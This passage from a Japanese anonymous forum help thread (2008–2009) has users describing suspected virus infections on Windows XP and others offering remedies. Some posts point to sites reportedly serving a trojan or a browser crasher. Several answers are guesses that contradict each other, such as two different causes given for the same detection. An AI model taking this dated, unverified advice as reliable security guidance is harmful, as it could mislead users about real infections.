FWを無効にするものもあるんですか・・・
この機会に何か入れたいと思います
265:名無しさん@お腹いっぱい。
08/12/27 09:41:43
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
266:名無しさん@お腹いっぱい。
08/12/27 09:46:58
211 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2008/12/27(土) 09:14:13
ウイルスや自らの操作(再起動のところをクリックする等)以外でも
パソコンが強制的に再起動させられたりしますか?
267:名無しさん@お腹いっぱい。
08/12/27 20:22:58
すでに廃業しているコムスンの公式HPを閲覧すると
トロイの木馬を送り込まれるようです。
こんなサイト放置しているのは危険だと思うので
あえて挑戦できるPC環境の方は
確認して、所定の機関に通報してください。
【感染する疑いのあるサイト⇒】URLリンク(www.comsn.c) o m
268: ◆N9P3SuvBPo
08/12/27 20:58:13
>267
行って来た
真っ白なページ
んで、ソース見たら怪しげなコードが…
JavaScriptを切っていれば無害?
269:名無しさん@お腹いっぱい。
08/12/28 02:05:34
>>267
アグスによる調査結果(事業閉鎖の案内は確認できる)
URLリンク(www.aguse.jp)
該当HPソース内の<head>...%エスケープされた難読化ファイル...</head>
間のスクリプト調査結果。
URLリンク(www.virustotal.com)
検出された、トロイの木馬の説明(以下説明の新種と思われる)
URLリンク(www.f-secure.co.jp)
サーバホスティングサービス(株式会社NTTPCコミュニケーションズ)
技術サポートに報告しました。
virustotalの結果を見ると、新種のようで少数のベンダーしか検出出来ていないの
で踏むのは危険ですねぇ。マジ迷惑な会社ですね。消え去った後も悪意をばらまい
ている
270:名無しさん@お腹いっぱい。
08/12/28 04:12:07
デコードしてみたけど、何も無かった。
271:名無しさん@お腹いっぱい。
08/12/28 20:26:42
なんだなんだ。
272:名無しさん@お腹いっぱい。
08/12/30 00:22:18
>>269
>>270
ご対応ありがとうございます。
しかし宣伝するわけではないけどアンチウィルスソフト
(Win Live OneCare)が検出してくれて助かった。
273:名無しさん@お腹いっぱい。
08/12/30 02:42:46
【使用OS】 「XPホームエディション」
【Microsoft Update(MU)の状態】 「」
【使用セキュリティソフトとバージョン】 「カスペルスキー」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「○」
【スパイウェア対策ソフト】 「?上記」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「」
【ルータの有無】 「有」
現在の状況:興味でえっちなアングラサイトを見てしまったらトロイやらワームやらてんこ盛りで感染
カスペルスキーでスキャン駆除をする前に
Windows Security Centerがピコピコ光ってたのでなんだろうとクリック
Antivirus2009に誘導されインストールを安易に触ってしまったら
貴方のPcは242個の脅威に感染してますから課金してねというページが表示
カスペルスキーあるからそっちで駆除してもらったのですが
その後もセキュリティセンターの「242個の警告」と、Antivirusの課金ページが勝手に表示されます・・・
ゲームや作業しててもいきなり表示されてそのたびに中断されてしまう状態で
削除したくともソレに該当する項目も無く
アプリの追加削除にも該当ナシで困ってます。
274:名無しさん@お腹いっぱい。
08/12/30 03:01:20
>>273
スレリンク(sec板)
スレリンク(sec板)
275:名無しさん@お腹いっぱい。
08/12/30 22:05:09
【使用OS】 「XP Home sp2」
【Microsoft Update(MU)の状態】 「sp3への更新をしてない状態」
【使用セキュリティソフトとバージョン】 「avast4.8Home」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「Spybot」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「ついさっき入れたばかり」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「Win32:SysPatch[Wrm]」
昨日うっかりあやしいページを踏んで感染
その後起動するたびにavastがウイルス発見しますた!!といちいちアラートを出すのだが、
SYSTEM32内USER32.DLLに感染しているみたいで削除も修復もチェストもなんにもできない
ググってみてもそれらしい項目が出てこないしで困った
avastのことだから誤検出かと思ったんだが気味が悪い
276: ◆N9P3SuvBPo
08/12/30 23:38:23
>275
正規ファイルのc:\windows\system32\user32.dllに感染か?
さらに詳細を知りたいので、↓のサイトでこのc:\windows\system32\user32.dllをスキャンして
スクリーンショットを取って結果をうpろだに上げてください。
URLリンク(www.virustotal.com)
277:名無しさん@お腹いっぱい。
08/12/30 23:52:51
>>276
システム上重要なファイルなのか知らないが、
0 bytes size received / Se ha recibido un archivo vacio
と表示されるだけで他は何もでなかった
インストールして送るソフトも使ったが駄目だった
でもavastやらウイルスバスターでオンラインスキャンしたら、
相変わらず何の処理も選べなかったけど今は再起動しても何故かavastは騒がなくなったわ
278: ◆N9P3SuvBPo
08/12/30 23:59:17
>277
なんだったんだろうね?
もう一度c:\windows\system32\user32.dllのファイルサイズを教えてください。
279:名無しさん@お腹いっぱい。
08/12/31 00:05:40
>>278
サイズは
574,976 バイト
ディスク上のサイズは
574,536 バイト
ってなってました
280: ◆N9P3SuvBPo
08/12/31 00:21:34
>279
環境によるかもしれないけど俺は
サイズ=574,464バイト
ディスク上のサイズ=577,536バイトですね
作成日時は2005年12月22日、19:05:40
更新日が2005年3月3日、3:09:44ですね
常駐してる対策ソフトが検出しなくなったのなら、
たぶんもう大丈夫だろう。
281:名無しさん@お腹いっぱい。
08/12/31 01:23:42
>>280
安心していたのもつかの間、またavastが騒ぎ出しました
なんで修復できないのかなって思ってたら読み取りモードだったかららしい
とりあえずuser32.dllをコピーして別の場所へ移してから読み取りモードを外してさっきのURLを再チャレンジ
結果が長くてどこまでスクショとればわからなかったけど一応これで…
URLリンク(www.e-kuraberu.net)
282:名無しさん@お腹いっぱい。
08/12/31 01:34:58
あっ281のパス忘れてた 4109です
283: ◆N9P3SuvBPo
08/12/31 02:54:50
>281
複数のベンダーが検出してるとこ見ると、誤検出ではないですね。
正規ファイルの感染…どう対応しようか?
system32内にuser32.dllありますよね。
通常モードのまま(セーフモードなら一旦再起動して通常モードで立ち上げる)
名前をuser32.bakにリネームしてください。
しばらく待っても、user32.dllが作成されないようなら
user32.bakをuser32.dllに戻してください。
284:名無しさん@お腹いっぱい。
08/12/31 05:30:32
URLリンク(dropfile.freehostia.com)
バーボンハウスって名前のブラクラ?サイトなんですが
ウィンドウが沢山開くわけでもなく、何をやってるのかよくわかりません
このサイトは何をしてくるのでしょうか?
285:名無しさん@お腹いっぱい。
08/12/31 05:59:57
>>284
完全にスレ違いだが
そこにアクセスすると何回も強制的にページを読み込まされる。
するとPCに負荷がかかるわけだが、自分の環境では特に被害は無い。
窓やタブを大量に開くだけがブラクラってわけじゃない
ブラクラって分かってるのなら安易に踏まないように。
286:名無しさん@お腹いっぱい。
08/12/31 06:08:01
スレ違いすいませんでした
よくわかりました、ありがとうございました
287:名無しさん@お腹いっぱい。
08/12/31 12:39:30
>>283
user32.dllをuser32.bakに変えたらちゃんとuser32.dllが作成されました
サイズを調べたら283さんと同じ574,464バイト、ディスク上が577,536バイトに戻っていました
作成されたdllをスキャンしても何も反応はなかったので恐らく正常な形になったんだと思います
その後再起動してみても何もuser32.dllの警告らしきものはでなかったので、先ほどリネームしたbakを削除しましたがこれで処理できたということでしょうか
288: ◆N9P3SuvBPo
08/12/31 13:11:14
>287
はい、OKです。(Windowsのシステム保護機能が効いたようです)
あとはAvastで全ドライブをスキャンして、何も検出されなければ解決です。
それと
>とりあえずuser32.dllをコピーして別の場所へ移してから
別の場所に移動したuser32.dllのコピーも削除してください。
289:名無しさん@お腹いっぱい。
09/01/04 23:19:56
テンプレ使用ご容赦下さい
キンタマや山田ウィルス等のウィルス対策として、プライベートなフォルダをEFSで暗号化すれば流出してもファイルを読み取られる事は無いのでしょうか?
290:名無しさん@お腹いっぱい。
09/01/04 23:43:39
キンタマ、山田ウイルスは板違い。
てかマルチ市ね。
291:名無しさん@お腹いっぱい。
09/01/05 02:19:26
>>289
>>92
292:名無しさん@お腹いっぱい。
09/01/07 00:21:16
【使用OS】 「WINDOWSXP」
【Microsoft Update(MU)の状態】 「何スかそれ・・」
【使用セキュリティソフトとバージョン】 「ウィルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「多分してます」
【スパイウェア対策ソフト】 「えぇ・・ウィルスバスターじゃだめスか・・?;」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「1週間に2回ほど」
【ルータの有無】 「不明」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「脅威名:Cookie DoubleClick」
「危険度:中」
「種類 :WebブラウザのCookie」
なんか正月明けくらいに18禁サイトまわったあとにウィルス検索したらこいつが出てきて
それから今日検索してみたらまたこいつが弾かれてました;
でも今日まで18禁サイトとか行ってないのになんでまた感染してるのか全くわかりません
何かに入っちゃってるんでしょうか?
対処策あったら教えてくださいm(__;)m
293:名無しさん@お腹いっぱい。
09/01/07 00:26:44
今また検索してみたらDoubleClickとAdvertisingとかいうのも増えちゃってますが・・・
やばいですかね?;
294:名無しさん@お腹いっぱい。
09/01/07 00:48:58
全部cookieを利用したスパイウェア。
スパイウェアといっても個人情報を盗んだりはしないが、PCが重くなったりはするかも。
サードパーティーのcookieを拒否すれば大抵のものは弾けると思う。
そんなことより
>【Microsoft Update(MU)の状態】 「何スかそれ・・」
今すぐやって来い。詳細はググれ。
295:名無しさん@お腹いっぱい。
09/01/07 08:14:09
了解です!
296:名無しさん@お腹いっぱい。
09/01/07 18:34:19
TrackingCookieはスパイウエアじゃねえが・・・・・・
297:名無しさん@お腹いっぱい。
09/01/07 20:55:23
【使用OS】 「xp pro sp3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「ウイルスバスター2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「済」
【スパイウェア対策ソフト】 「ウイルスバスター2009」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「済」
【ルータの有無】 「有」
今日行った検索でTROJ_Generic.DITというものが見つかりました
以下のものに感染していたようです
wingogo.ex_
CyberLink\PowerDVD\Language\Enu\pdvd7_dvdaudio\pdvd7_dvdaudio.html
CyberLink\PowerDVD\Language\Kor\pdvd7_dvdaudio\pdvd7_dvdaudio.html
compile\petit\readme_e.html
感染ファイルは隔離後に削除してます
その後の手動検索ではみつかってません
TROJ_Generic.DITがどんなウイルスなのか検索してもうまく見つからず
削除しとけば安心なのか心配です
対策法をご教授いただけたらと思います
298:名無しさん@お腹いっぱい。
09/01/07 21:32:56
>>297
隔離したファイルはすぐに削除せずにしばらく様子見した方がいいよ
実は誤検知で、数日後に定義の修正があること多いからね
VirusTotalとかJotti's malware scanを利用するといい
299:名無しさん@お腹いっぱい。
09/01/07 21:47:59
個人情報が入っているファイルがあって、それはWinRARでパスワードを掛けて圧縮していて
編集するときは、一時的にTempファイルに解凍した状態でファイルに保存することなく編集するようにしています
それが、いつのまにか勝手にデスクトップに解凍されているという現象が今までに2度ほど起きているのですが、
これはトロイ等に感染していると思ったほうがいいのでしょうか?
ノートンを使用しているので、ノートンでスキャンを行うも2度とも検出されませんでした
非常に不安になり2度とも変更が必要と思われる情報は変更を行ったのですが今のところ実害はない状態です
300:名無しさん@お腹いっぱい。
09/01/07 22:33:25
すみません、テンプレ読んでませんでした。
どうかよろしくお願いします。
【使用OS】 Windows XP Pro SP3
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 Norton Internet Security (10.2.0.30)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「有り」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「検出されませんでした」
301:名無しさん@お腹いっぱい。
09/01/07 22:33:56
299=300です
302:名無しさん@お腹いっぱい。
09/01/08 23:44:00
trdhost.exe とは何者でしょうか?rdhost.exeではなく tdrhost.exeでした。
Googleで調べても出てこず,不安になって消しましたが,いったい何だったのか逆に不安になってきました。
回線が上りも下りも微妙に使っている状態だったので不審に思いタスクマネージャをみると,CPU使用率が1~3になっては0になる不振なexeを見つけました。
それがtrdhost.exeなのですが,窓の手を見る限りスタートアップではないし,ウイルスバスターも反応せず,そもそも情報がないということで気味が悪いです。
消したら不振なデータ移送は止まりましたが,不安です……
どなたかtrdhost.exeについてご存じの方は,お教えください……
【使用OS】 「Win XP pro SP3」
【使用セキュリティソフトとバージョン】 「セキュリティ対策ツール Ver. 1.5 (ウイルスバスター?)」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「YES」
【スパイウェア対策ソフト】 「上記のものがが兼ねてると思う」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「YES」
【ルータの有無】 「NTT光プレミアムから借りてるルーター」
303: ◆N9P3SuvBPo
09/01/09 01:00:29
>302
tdrhost.exeのプロパティを見れば、大まかな情報は分かる
怪しいと思ったらvirustotalでスキャンして正体を突き止める
304:名無しさん@お腹いっぱい。
09/01/09 01:45:51
tdrなのかtrdなのか
305:302
09/01/09 01:54:51
>>303-304 trdです。C:\WINDOWS\Prefetch 内に TRDHOST.EXE-2EAF3965.pf がありましたが,本体とおぼしき物は見つかりませんでした。
これをVirustotalでスキャンしましたが,何も反応はありませんでした。
取りあえず今のところは問題ないので,様子を見てみようと思います。ありがとうございました。
306:名無しさん@お腹いっぱい。
09/01/09 13:25:36
>>297
自分もウイルスバスターで同じものでました。
一週間前にスキャンして終了してから初起動した時に検出されたんで誤検知を疑ってます。
307:名無しさん@お腹いっぱい。
09/01/09 19:08:09
>>299
WinRARは機能豊富だから、オペミスでは?気になるなら複数のベンダーでオンラインスキャン
してみると良いよ。
>>305
プリフェッチファイル(pf)は本体と別の形式だから、それ調べてみても詳細は判らないよ。
よく「消してしまった」の後で、ウイルスですか?質問多いけど、隔離されてるなら心配な
いから、303の言うようにまず調べてみるのがよいね。
308:302
09/01/10 00:15:20
Windows/system32/trdhost.exe が犯人だと分かりましたが,System32フォルダを覗いてもそれはありませんでした。
とりあえずパスをvirustotalに打ち込むと何やらアップロードしたら,いくつかの検査ソフトが反応していました。
しかし『隠しファイルを表示する』にしてもtrdは見えず,消すことが出来ません。
プロセスに表示されるので存在するのでしょうが……
またあれから注意深く監視してみましたが,勝手に送受信するようなことはありませんでした。
なので時限爆弾を抱えてるつもりで,ウイルスとして判断されるまで付き合っていくしかありません……
309:名無しさん@お腹いっぱい。
09/01/10 00:29:32
ファイルとレジストリは隠すのに、プロセスを隠さないルートキットなんてあるの?
310:名無しさん@お腹いっぱい。
09/01/10 00:41:32
間抜けなルートキットなんだろ
SafeModeで見えますとかまれによくある
311:名無しさん@お腹いっぱい。
09/01/10 00:50:15
> まれによくある
どっちだよw
とりあえず、>>308はルートキットスキャナを使ってみた方がいいな。
312:名無しさん@お腹いっぱい。
09/01/10 17:25:04
>>297
それ私も検知されました。
一週間前に検索したところ、反応なかったのですが…
今は隔離させています。
てか、セキュリティダッシュボード上では検知されてないのですよね。
313:名無しさん@お腹いっぱい。
09/01/11 10:06:43
>>297
うちもそれでたよ
前に検索した時は検出されなかったんだけど
今は>>312と同じで隔離中です
隔離する前に、シマンテックのオンラインスキャンかけたら、検出はされなかったです
314:名無しさん@お腹いっぱい。
09/01/11 13:44:41
★質問用テンプレ★
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「avast! バージョン4.8-1296」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Spybot-Search&Destroy」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
・DoubleClick
・KGBkeylogger
・Microsoft.Windows.Explorer
・Microsoft.WindowsSecurityCenter.TaskManager
・Right Media
Spybot-Search&Destroyで何度削除しても検知されます。
315:名無しさん@お腹いっぱい。
09/01/11 14:58:32
>>297
わたしも8日にウイルスバスターで検知されました。
始めてウイルス検知されたもんで(バスター2年使用)
あせって感染ファイルを確かめずに削除してしまいました…
その後手動検索しましたが何も検知されません。
大丈夫なのでしょうか。
316:名無しさん@お腹いっぱい。
09/01/11 20:04:23
【使用OS】 「XP home sp2」
【Microsoft Update(MU)の状態】 「最近やってません」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2007を一年延長してます」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【ルータの有無】 「NTTのを使用」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
マイスペやってたら変な所をクリックしたらしく
stabilityinternetscan.comというサイトに飛ばされ、「ウイルス感染してるから
セキュリティソフトをダウンロードしろ」とメッセージが出たので「いいえ」を
クリックして接続切ったんですが、ノートンでチェックしても異常は出ず、ググッたら
URLリンク(www.precisesecurity.com)
URLリンク(www.precisesecurity.com)
「System security」というソフトをインストールさせるための騙しサイト
らしいとわかりました。
ユーザーの書き込みをみるとポップアップが出て来るようですが私のPCには
出て来ません。
これは感染せずに済んでいるんでしょうか?
余計なクリックせずに接続切ればよかったんでしょうが「いいえ」をクリックして
しまったので気になります。
ノートンのウイルスリストには入ってなくて感染してるかどうかがわからないんです。
317:名無しさん@お腹いっぱい。
09/01/11 20:40:38
>>316
exeをダウンロードして実行していなければ問題なし
318:名無しさん@お腹いっぱい。
09/01/11 21:24:42
>>317
ありがとうございます、安心しました。
319:名無しさん@お腹いっぱい。
09/01/12 22:10:53
最近インターネットにアクセスすると
蜘蛛のアニメーションが出てくるようになりました
画面上を動き回ります。
こいつの影響なのか接続も遅くなったようです
スキャンでは検出されません
何か良い解決策を教えてください
320:名無しさん@お腹いっぱい。
09/01/13 00:47:48
使用OS】 Windows XP
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 ウイルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 済
【スパイウェア対策ソフト】 ウイルスバスター2009
【スパイウェア対策ソフトの更新は定期的に行なっているか】 済
【ルータの有無】 有
外付けHDDをチェックしたところTROJ Generic.DITが検出されました
トロイの木馬の一種のようですがググってもよく分かりません
これがどのような悪さをするのかご存知の方、教えてください
321:名無しさん@お腹いっぱい。
09/01/13 01:21:31
マルチウゼー
322:名無しさん@お腹いっぱい。
09/01/13 02:37:58
>>320
マジレスするとJavaScript関係、キャッシュを消せば解決
323:名無しさん@お腹いっぱい。
09/01/13 03:17:18
>>320
ドライブの復元ポイントに忍び込んでるタイプ。復元ポイントを削除すれば消える
324:初心者
09/01/13 19:18:16
RemoteAdmin.Win32.RemotelyAnywhere.o
ってウイルスを検知したんですがどんな悪さをするか教えて欲しいです。
御願いします。
325:名無しさん@お腹いっぱい。
09/01/13 22:54:25
>>324
今出てる具体的な症状をできるだけ詳細に述べてくれ。ただ個人的にはRemoteAdmin、RemotelyAnywhereってので何となく想像できる
326:名無しさん@お腹いっぱい。
09/01/13 22:57:34
>>319
OS再インスコも覚悟。スキャンで検出できず自力での削除も不可能なら危険、データが無事なうちに早めにする。そのうちブルーの画面が出てPCが攻撃されてますって英語で出てくることもある。
327:名無しさん@お腹いっぱい。
09/01/13 23:40:16
>>326
やっぱ有名なウイルスなんでしょうか?
蜘蛛のアニメが画面上に出てくるって
超冷や汗ものですよ
リカバリってことですよね
ありがとうございました
328:名無しさん@お腹いっぱい。
09/01/14 01:25:47
>>327
名前忘れたけど厄介だってのは知ってる。デスクトップに置いてあるデータも被害なく外付けに退避させられるからいいものの・・
確かに超冷や汗ものの一つだな。関わりたくないものの一つだ
こいつはダウンロードものに感染してるんじゃなくて海外サイト経由でひっかかるタイプだった気がする。
未知の海外サイト見る時はaguse gatewayを使った方が無難。危険なところも安全に見れる
今後の参考にしてくれ。多分最近見たサイトのどれかのはずだ
329:名無しさん@お腹いっぱい。
09/01/14 01:31:28
【使用OS】 Windows XP pro
【Microsoft Update(MU)の状態】 sp3にしてない状態
【使用セキュリティソフトとバージョン】 カスペアンチウイルス2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 はい
【スパイウェア対策ソフト】 spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 はい
【ルータの有無】 有
【スキャンの結果】検出なし
最近system32にb33r06hF.exe.a_aとかmqM471x7.exe.a_aというファイルがたびたび出現します。
mqM471x7の方ができた場合、IEが自動起動・自動closeが3分おきくらいに繰り返されます。
スパイウェアなような気もしますが、
ぐぐっても特に情報が見つからなかったため、とりあえずこちらに書かせていただきました。
もし何かご存知の方おりましたら、情報いただけませんか?
330:名無しさん@お腹いっぱい。
09/01/14 02:04:57
>>329
つURLリンク(www.google.co.jp)
つURLリンク(www.trendmicro.co.jp)
331:名無しさん@お腹いっぱい。
09/01/14 09:55:15
>>330
どうもありがとうございます。
ファイル名でなく、拡張子で検索すればよかったんですね・・・